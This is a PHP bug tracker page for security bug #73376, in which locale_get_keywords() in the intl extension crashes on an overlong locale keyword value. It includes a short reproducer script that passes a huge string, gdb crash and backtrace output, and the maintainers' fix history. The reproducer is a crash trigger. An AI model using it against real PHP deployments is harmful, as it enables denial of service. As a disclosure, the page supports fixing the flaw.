php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #73376 crash in locale_get_keywords() when keyword value in locale string too long
Submitted: 2016-10-23 09:09 UTC Modified: 2016-11-14 11:45 UTC
From: nguyenluan dot vnn at gmail dot com Assigned: stas (profile)
Status: Closed Package: intl (PECL)
PHP Version: 7.0.13 OS:
Private report: No CVE-ID: None
 [2016-10-23 09:09 UTC] nguyenluan dot vnn at gmail dot com
Description:
------------
Funtion locale_get_keywords():

PHP_FUNCTION( locale_get_keywords )
{
    UEnumeration*   e        = NULL;
    UErrorCode      status   = U_ZERO_ERROR;

    ...
    ...

        	while( ( kw_key = uenum_next( e, &kw_key_len, &status ) ) != NULL ){
    		kw_value_len = 100;
			kw_value_str = zend_string_alloc(kw_value_len, 0);

			/* Get the keyword value for each keyword */
			kw_value_len=uloc_getKeywordValue( loc_name, kw_key, ZSTR_VAL(kw_value_str), kw_value_len, &status );  // (1) crash in this call
			if (status == U_BUFFER_OVERFLOW_ERROR) {

    ...
    ...
}

When passing large keyword value in locale string, this function causes PHP 7 to crash.

Test script:
---------------
<?php
    ini_set('memory_limit', -1);
    
    $str = str_repeat('test', 0x3fffffff);
    $keywords_arr = locale_get_keywords("de_DE@currency=EUR;collation=$str");
?>

Expected result:
----------------
No crash.

Actual result:
--------------
gdb-peda$ r ../test/string/test.php 
Starting program: /home/user/Desktop/php-7.0.12/sapi/cli/php ../test/string/test.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.

 [----------------------------------registers-----------------------------------]
RAX: 0x7fffebc730b8 ("testtesttesttesttesttesttesttestt")
RBX: 0xfffffffc 
RCX: 0x73657474 ('ttes')
RDX: 0x0 
RSI: 0x9 ('\t')
RDI: 0x7fffebdfffe0 --> 0x0 
RBP: 0x7fffffffa5e0 ("collation")
RSP: 0x7fffffffa588 --> 0x7ffff4350c65 (<uloc_getKeywordValue_55+741>:	)
RIP: 0x7ffff3939435 (<__strncpy_sse2_unaligned+3685>:	)
R8 : 0xffffffffffe73094 
R9 : 0x0 
R10: 0x1c 
R11: 0x7ffff3a1a650 --> 0xfff1e980fff1e970 
R12: 0x7ffdeb400035 ("testtesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttest"...)
R13: 0x9 ('\t')
R14: 0x7fffebc730b8 ("testtesttesttesttesttesttesttestt")
R15: 0x7ffdeb40002b ("collation=testtesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttestte"...)
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x7ffff393942a <__strncpy_sse2_unaligned+3674>:	
    jb     0x7ffff3939449 <__strncpy_sse2_unaligned+3705>
   0x7ffff393942c <__strncpy_sse2_unaligned+3676>:	
    movdqa XMMWORD PTR [rdi],xmm0
   0x7ffff3939430 <__strncpy_sse2_unaligned+3680>:	
    movdqa XMMWORD PTR [rdi+0x10],xmm0
=> 0x7ffff3939435 <__strncpy_sse2_unaligned+3685>:	
    movdqa XMMWORD PTR [rdi+0x20],xmm0
   0x7ffff393943a <__strncpy_sse2_unaligned+3690>:	
    movdqa XMMWORD PTR [rdi+0x30],xmm0
   0x7ffff393943f <__strncpy_sse2_unaligned+3695>:	add    rdi,0x40
   0x7ffff3939443 <__strncpy_sse2_unaligned+3699>:	sub    r8,0x40
   0x7ffff3939447 <__strncpy_sse2_unaligned+3703>:	
    jae    0x7ffff393942c <__strncpy_sse2_unaligned+3676>
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffa588 --> 0x7ffff4350c65 (<uloc_getKeywordValue_55+741>:	)
0008| 0x7fffffffa590 --> 0x0 
0016| 0x7fffffffa598 --> 0x7ffdeb400034 ("=testtesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttes"...)
0024| 0x7fffffffa5a0 --> 0x7fffffffa704 --> 0x900000000 ('')
0032| 0x7fffffffa5a8 --> 0x7fffffffa5c0 ("collation")
0040| 0x7fffffffa5b0 --> 0x6400000000 ('')
0048| 0x7fffffffa5b8 --> 0x7fffebc730b8 ("testtesttesttesttesttesttesttestt")
0056| 0x7fffffffa5c0 ("collation")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
__strncpy_sse2_unaligned ()
    at ../sysdeps/x86_64/multiarch/strcpy-sse2-unaligned.S:1671
1671	../sysdeps/x86_64/multiarch/strcpy-sse2-unaligned.S: No such file or directory.

gdb-peda$ bt
#0  __strncpy_sse2_unaligned ()
    at ../sysdeps/x86_64/multiarch/strcpy-sse2-unaligned.S:1671
#1  0x00007ffff4350c65 in uloc_getKeywordValue_55 ()
   from /usr/lib/x86_64-linux-gnu/libicuuc.so.55
#2  0x00000000006eea58 in zif_locale_get_keywords (
    execute_data=0x7fffebc141b0, return_value=0x7fffebc14120)
    at /home/user/Desktop/php-7.0.12/ext/intl/locale/locale_methods.c:732
#3  0x0000000000ad8506 in ZEND_DO_ICALL_SPEC_HANDLER ()
    at /home/user/Desktop/php-7.0.12/Zend/zend_vm_execute.h:586
#4  0x0000000000ad7f32 in execute_ex (ex=0x7fffebc14030)
    at /home/user/Desktop/php-7.0.12/Zend/zend_vm_execute.h:414
#5  0x0000000000ad8043 in zend_execute (op_array=0x7fffebc81000, 
    return_value=0x0)
    at /home/user/Desktop/php-7.0.12/Zend/zend_vm_execute.h:458
#6  0x0000000000a78cfc in zend_execute_scripts (type=0x8, retval=0x0, 
    file_count=0x3) at /home/user/Desktop/php-7.0.12/Zend/zend.c:1427
#7  0x00000000009e11d5 in php_execute_script (primary_file=0x7fffffffce20)
    at /home/user/Desktop/php-7.0.12/main/main.c:2494
#8  0x0000000000b412f8 in do_cli (argc=0x2, argv=0x14a6630)
    at /home/user/Desktop/php-7.0.12/sapi/cli/php_cli.c:974
#9  0x0000000000b424c6 in main (argc=0x2, argv=0x14a6630)
    at /home/user/Desktop/php-7.0.12/sapi/cli/php_cli.c:1344
#10 0x00007ffff38b3830 in __libc_start_main (main=0xb41cbb <main>, argc=0x2, 
    argv=0x7fffffffe1a8, init=<optimized out>, fini=<optimized out>, 
    rtld_fini=<optimized out>, stack_end=0x7fffffffe198)
    at ../csu/libc-start.c:291
#11 0x00000000004475a9 in _start ()


Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2016-11-04 03:09 UTC] stas@php.net
-PHP Version: 7.0.12 +PHP Version: 5.6.27
 [2016-11-04 06:01 UTC] stas@php.net
-Status: Open +Status: Closed -Assigned To: +Assigned To: stas
 [2016-11-04 06:01 UTC] stas@php.net
The fix for this bug has been committed.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.

 For Windows:

http://windows.php.net/snapshots/
 
Thank you for the report, and for helping us make PHP better.
 [2016-11-11 12:36 UTC] nguyenluan dot vnn at gmail dot com
-Status: Closed +Status: Assigned
 [2016-11-11 12:36 UTC] nguyenluan dot vnn at gmail dot com
I checked with PHP version 7.0.13, it still crashes. Please check again.
 [2016-11-11 12:37 UTC] nguyenluan dot vnn at gmail dot com
-Status: Assigned +Status: Open -PHP Version: 5.6.27 +PHP Version: 7.0.13
 [2016-11-11 12:37 UTC] nguyenluan dot vnn at gmail dot com
Open this issue again.
 [2016-11-14 11:45 UTC] nguyenluan dot vnn at gmail dot com
-Status: Open +Status: Closed
 [2016-11-14 11:45 UTC] nguyenluan dot vnn at gmail dot com
Fixed in PHP 7.1.0 RC6. Please close.

Thanks.
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Mon Dec 30 14:01:28 2024 UTC